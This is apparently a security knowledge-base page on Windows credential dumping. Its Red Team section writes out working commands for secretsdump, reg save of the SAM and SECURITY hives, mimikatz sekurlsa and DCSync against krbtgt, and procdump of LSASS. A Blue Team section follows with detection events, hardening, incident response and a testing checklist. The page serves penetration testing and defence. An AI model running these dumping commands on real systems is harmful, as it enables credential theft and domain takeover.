Credential Dumping
Once you hold local privileges (admin/SYSTEM) on a host, the goal is to harvest credentials to move laterally and escalate in the domain. Windows stores secrets in several places: the local SAM database, the memory of the LSASS process, domain caches, LSA Secrets, DPAPI, browsers, and, on a DC, the NTDS.dit database with all the domain’s hashes. Credential dumping is the engine of lateral movement: a hash stolen here is someone’s session on the next host.
Threat model
Section titled “Threat model”Windows keeps credentials in memory for Single Sign-On: while a user is logged on, their authentication material (NTLM hash, sometimes cleartext via WDigest, Kerberos tickets) lives in LSASS. Whoever is SYSTEM can read that memory. The attacker turns “admin on one host” into “the credentials of everyone who logged on there,” including domain admins who passed through that machine.
Red Team
Section titled “Red Team”SAM + LSA Secrets (local secrets)
Section titled “SAM + LSA Secrets (local secrets)”# remote with local-admin credentialssecretsdump.py domain/admin:pass@<host>nxc smb <host> -u admin -p pass --sam --lsa# local with the hives (requires SeBackup or SYSTEM)reg save HKLM\SAM sam & reg save HKLM\SYSTEM sys & reg save HKLM\SECURITY secsecretsdump.py -sam sam -system sys -security sec LOCALSAM yields local-account hashes; LSA Secrets holds service/task passwords, machine-account secrets, and sometimes cleartext credentials.
LSASS (in-memory credentials)
Section titled “LSASS (in-memory credentials)”The jackpot: hashes and tickets of every user with an active session.
# mimikatz (Windows)privilege::debugsekurlsa::logonpasswordssekurlsa::tickets /export# dump the process and parse offline (stealthier)procdump -ma lsass.exe lsass.dmp # then: pypykatz lsa minidump lsass.dmp# nanodump / comsvcs.dll as a LOLBin for the dumpNTDS.dit (on a DC = the whole domain)
Section titled “NTDS.dit (on a DC = the whole domain)”The AD database contains the hashes of all domain users.
# DCSync: request replication without touching the DC's disk (needs DS-Replication rights)secretsdump.py domain/admin:pass@<DC> # uses DRSUAPI (DCSync)mimikatz # lsadump::dcsync /user:krbtgt# or copy NTDS.dit + SYSTEM (SeBackup / ntdsutil / VSS) and process offlineDCSync is the key technique: with replication rights (held by DA/EA and misdelegated accounts) you request hashes as if you were another DC, including krbtgt (→ Golden Ticket, see Active Directory Persistence).
Other treasures
Section titled “Other treasures”- DPAPI: browser, Wi-Fi, RDP, Credential Manager secrets (mimikatz
dpapi::, SharpDPAPI). - Cached domain credentials (MSCache/DCC2): hashes of prior logons (slow cracking, hashcat 2100).
- Browsers: cookies/passwords (SharpChrome). LSA protected (RunAsPPL): needs a bypass.
- mimikatz — the standard (sekurlsa, lsadump, dpapi).
- impacket secretsdump.py — remote SAM/LSA/NTDS/DCSync from Linux.
- NetExec (nxc)
--sam --lsa --ntds— mass multi-host dumping. - pypykatz / nanodump / procdump / comsvcs — LSASS dump and offline parsing.
- SharpDPAPI / LaZagne — DPAPI and app credentials.
Impact
Section titled “Impact”From local admin to credentials reusable across the network; from a DC, to all the domain’s hashes (including krbtgt) → full, persistent control. It’s the step that turns a compromised host into a domain compromise.
Blue Team
Section titled “Blue Team”Detection
Section titled “Detection”- LSASS access: Sysmon event 10 with
TargetImage lsass.exeand a memory-readGrantedAccess(0x1010/0x1410…) → dump signature. - DCSync: 4662 with the replication GUID (
DS-Replication-Get-Changes) from a principal that is not a DC → very high fidelity. reg saveof SAM/SECURITY/SYSTEM; NTDS.dit reads via VSS; mimikatz/procdump execution over lsass.
Telemetry
Section titled “Telemetry”Sysmon 10 (process access to lsass), 11 (dump to disk), DC replication auditing (4662 with DRSUAPI GUIDs), shadow-copy creation (VSS).
Hardening
Section titled “Hardening”- Credential Guard (isolates LSASS in VBS) and RunAsPPL (LSASS as a protected process) → stop direct dumping.
- Disable WDigest (no more cleartext passwords in memory).
- Restrict replication rights (DCSync) to DCs; audit them in BloodHound.
- Tiering/PAW: keep DAs off workstations (don’t leave their credentials in user hosts’ LSASS); Protected Users.
- LAPS (unique local admin per host → a stolen hash doesn’t open the whole network).
Response
Section titled “Response”If a DC or domain credentials fell: rotate krbtgt twice, reset exposed accounts and affected machine accounts, rebuild compromised hosts, and review persistence (Golden Ticket, DCShadow).
CVEs and real-world cases
Section titled “CVEs and real-world cases”- LSASS/NTDS dumping is a ubiquitous TTP (MITRE T1003: .001 LSASS, .002 SAM, .003 NTDS, .006 DCSync).
- mimikatz (Benjamin Delpy) is probably the most-used offensive tool in AD history.
- NotPetya, Conti, BlackCat and nearly all modern ransomware dump LSASS and DCSync to reach DA.
- CVE-2021-36934 (HiveNightmare) let a non-privileged user read SAM.
Testing checklist
Section titled “Testing checklist”- Host SAM + LSA Secrets (secretsdump/nxc)
- LSASS dump (mimikatz/procdump/pypykatz) — cleartext passwords (WDigest)?
- Cached domain credentials (DCC2) crackable
- DPAPI: browsers, Credential Manager, RDP
- Replication rights for DCSync? → krbtgt
- On DC: full NTDS.dit (DCSync or VSS)
- Is LSASS protected (RunAsPPL/Credential Guard)? Bypass needed?
- Blue: detection of LSASS access and non-DC DCSync?